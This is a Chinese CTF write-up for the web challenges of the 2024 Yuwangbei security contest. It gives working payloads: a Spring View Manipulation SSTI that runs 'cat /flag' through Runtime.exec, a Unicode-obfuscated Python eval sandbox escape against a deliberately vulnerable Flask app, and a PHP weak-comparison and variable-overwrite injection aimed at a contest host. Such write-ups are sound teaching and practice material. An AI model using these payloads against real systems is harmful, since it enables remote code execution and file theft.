【Web】御网杯信息安全大赛2024 wp(全)

目录

input_data

admin

flask

如此多的FLAG


一夜醒来之全国CTF水平提升1000倍😋

input_data

访问./.svn后随便翻一翻拿到flag

admin

dirsearch扫出来

访问./error看出来是java框架

测出来是/admin;/路由打Spring View Manipulation(Java)的SSTI

https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability

payload:

复制代码
/admin;/?path=__%24%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7D__%3A%3A.x

​​​​​​​

flask

题目附件

复制代码
from flask import Flask, request, Response
import random
import re

app = Flask(__name__)

@app.route('/')
def index():
    evalme = request.args.get('evalme')

    if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):
        return 'hacker?'

    with open(eval(evalme), 'rb') as f:
        return Response(f.read())


if __name__ == '__main__':
    app.run(port=8080)

用这个

GitHub - Macr0phag3/parselmouth: 自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework

复制代码
python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

删去空格得到payload:

复制代码
?evalme=𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒎a𝒙(𝒅𝒊c𝒕(𝒋𝒐𝒊𝒏=())))(𝒎a𝒑(𝒄𝒉𝒓,[106,111,105,110])))(𝒎a𝒑(𝒄𝒉𝒓,[47,102,108,97,103]))

如此多的FLAG

初始界面有提示

访问./F1aaj.php

看cookie

访问./FLLL4g.php

简单的php bypass,最后走一个eval代码注入变量覆盖弱比较

payload:

复制代码
http://101.200.58.4:20005/FLLL4g.php?X[]=99999&Y=0e1284838308&Z=1;$f1ag=0
相关推荐
ftpeak3 天前
从零开始使用 axum-server 构建 HTTP/HTTPS 服务
网络·http·https·rust·web·web app
fanged3 天前
Cesium4--地形(OSGB到3DTiles)
3d·gis·web
三角叶蕨3 天前
javaweb CSS
css·web
OEC小胖胖3 天前
App Router vs. Pages Router:我应该如何选择?
开发语言·前端·前端框架·web·next.js
脑子慢且灵5 天前
[JavaWeb]模拟一个简易的Tomcat服务(Servlet注解)
java·后端·servlet·tomcat·intellij-idea·web
虚伪的空想家6 天前
K8S的dashboard部署与访问
云原生·容器·kubernetes·k8s·web·dashboard
脑子慢且灵7 天前
【JavaWeb】一个简单的Web浏览服务程序
java·前端·后端·servlet·tomcat·web·javaee
诗人不说梦^7 天前
[RootersCTF2019]I_<3_Flask
web·ctf
爱隐身的官人8 天前
cfshow-web入门-php特性
python·php·ctf
爱隐身的官人8 天前
ctfshow - web - nodejs
前端·nodejs·ctf